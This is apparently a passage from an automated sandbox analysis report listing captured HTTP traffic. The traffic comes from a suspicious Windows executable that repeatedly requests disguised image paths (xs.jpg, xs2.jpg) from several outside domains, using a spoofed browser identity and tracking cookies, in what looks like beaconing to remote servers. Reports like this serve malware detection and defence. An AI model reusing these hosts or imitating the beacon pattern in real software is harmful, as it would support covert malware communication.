                                  93192.168.2.94980644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:09.991240025 CEST302OUTGET /xs.jpg?2bcaf743=1582807576 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159326|1720159259|3|18|0
                                  Jul 5, 2024 08:02:10.486390114 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:10 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  94192.168.2.94980744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:10.546094894 CEST306OUTGET /images/xs.jpg?2ca70649=-1098498342 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159327|1720159260|3|18|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:11.034728050 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:10 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  95192.168.2.94980878.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:11.167100906 CEST192OUTGET /xs.jpg?2cfced02=1509546500 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:11.842875004 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:11 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  96192.168.2.94980937.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:11.864140034 CEST205OUTGET /images/xs2.jpg?2e7d9d4b=1944906328 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:12.586895943 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:12 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:12.588943958 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:12.811820030 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:12 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:12 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  97192.168.2.94981054.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:12.970118999 CEST311OUTGET /images/xs.jpg?3c09d975=2014556906 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159329|1720159259|3|19|0
                                  Jul 5, 2024 08:02:13.700014114 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:13 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  98192.168.2.94981144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:13.749687910 CEST301OUTGET /xs.jpg?3d14cd8b=633027043 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159330|1720159259|3|19|0
                                  Jul 5, 2024 08:02:14.238537073 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:14 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  99192.168.2.94981244.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:14.259538889 CEST305OUTGET /images/xs.jpg?3e44093b=-116382484 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159330|1720159260|3|19|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:14.757560015 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:14 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  100192.168.2.94981378.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:14.792678118 CEST192OUTGET /xs.jpg?3f86f717=1002352591 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:15.639409065 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:15 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  101192.168.2.94981437.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:15.707665920 CEST206OUTGET /images/xs2.jpg?41d7fe37=-1961888438 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:16.444581032 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:16 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:16.475994110 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:16.705194950 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:16 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:16 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  102192.168.2.94981554.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:16.892206907 CEST311OUTGET /images/xs.jpg?445d8e02=-561061362 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159333|1720159259|3|20|0
                                  Jul 5, 2024 08:02:17.630115986 CEST595INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:17 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159337|1720159259|3|21|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  103192.168.2.94981644.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:17.677812099 CEST301OUTGET /xs.jpg?45cf8c26=389951640 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159334|1720159259|3|20|0
                                  Jul 5, 2024 08:02:18.157691956 CEST586INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:18 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159338|1720159259|3|21|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  104192.168.2.94981744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:18.242449999 CEST306OUTGET /images/xs.jpg?4666d3a0=-1073462208 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159334|1720159260|3|20|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:18.752218008 CEST334INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:18 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159338|1720159260|3|21|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  105192.168.2.94981878.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:02:18.766397953 CEST193OUTGET /xs.jpg?47518eef=-1901912610 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:19.436955929 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:19 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
